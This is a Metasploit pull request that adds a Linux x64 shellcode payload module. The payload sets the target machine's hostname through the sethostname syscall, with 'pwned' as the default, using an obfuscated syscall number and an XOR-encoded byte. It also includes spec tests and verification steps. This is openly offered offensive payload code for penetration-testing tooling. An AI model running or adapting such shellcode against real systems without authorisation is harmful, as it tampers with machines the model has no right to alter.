### PR TITLE
Add payload/linux/x64/set_hostname module.

### DIFF
--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -49,7 +49,7 @@ module MetasploitModule
       pop rdi    ; rdi points to the hostname string.
       xor byte [rdi+rsi], 0x41
       syscall
-      
+
       push 60    ; exit() syscall number.
       pop rax
       xor rdi,rdi

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -1,0 +1,57 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule 
+
+  CachedSize = 28
+  
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Linux Set Hostname',
+      'Description' => 'Sets the hostname of the machine.',
+      'Author'      => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_X64,
+      'Privileged'  => true
+    ))
+
+    register_options(
+      [
+        OptString.new('HOSTNAME', [true, 'The hostname to set.','pwned'])
+      ])
+  end
+
+  def generate(_opts = {})
+    hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.
+    length = hostname.length
+    if length > 0xff
+      fail_with(Msf::Module::Failure::BadConfig, "HOSTNAME must be less than 255 characters.")
+    end
+
+    payload = %Q^
+      xor rax, rax
+      xor rsi, rsi
+      push rax    ; push the null byte of the hostname string to stack.
+      mov al, 170 ; sethostname() syscall number.
+      jmp str
+
+    end:
+      mov sil, #{length}
+      pop rdi    ; rdi points to the hostname string.
+      syscall
+      ret        ; break the loop by causing segfault.
+
+    str:
+      call end
+      db "#{hostname}"
+    ^
+
+    Metasm::Shellcode.assemble(Metasm::X64.new,payload).encode_string
+  end
+end

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 28
+  CachedSize = 25
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 33
+  CachedSize = 40
 
   include Msf::Payload::Single
   include Msf::Payload::Linux

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -49,7 +49,11 @@ module MetasploitModule
       pop rdi    ; rdi points to the hostname string.
       xor byte [rdi+rsi], 0x41
       syscall
-      ret        ; break the loop by causing segfault.
+      
+      push 60    ; exit() syscall number.
+      pop rax
+      xor rdi,rdi
+      syscall
 
     str:
       call end

--- a/modules/payloads/singles/linux/x64/set_hostname.rb
+++ b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 25
+  CachedSize = 33
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
@@ -38,20 +38,22 @@ module MetasploitModule
     end
 
     payload = %^
-      push 170 ; sethostname() syscall number.
+      push 0xffffffffffffff56 ; sethostname() syscall number.
       pop rax
+      neg rax
       jmp str
 
     end:
       push #{length}
       pop rsi
       pop rdi    ; rdi points to the hostname string.
+      xor byte [rdi+rsi], 0x41
       syscall
       ret        ; break the loop by causing segfault.
 
     str:
       call end
-      db "#{hostname}"
+      db "#{hostname}A"
     ^
 
     Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2105,6 +2105,16 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/x64/exec'
   end
 
+  context 'linux/x64/set_hostname' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/x64/set_hostname'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x64/set_hostname'
+  end
+  
   context 'linux/x64/pingback_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This payload sets the hostname of a Linux x64 machine by using the sethostname syscall. It requires root privileges.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payload/linux/x64/set_hostname`
- [ ] Set the  `HOSTNAME ` option as desired.
- [ ] Run  `generate ` to produce the payload.
- [ ] Execute the generated payload on a Linux x64 target with root privileges.
- [ ] **Verify** that the hostname has changed to the specified value.
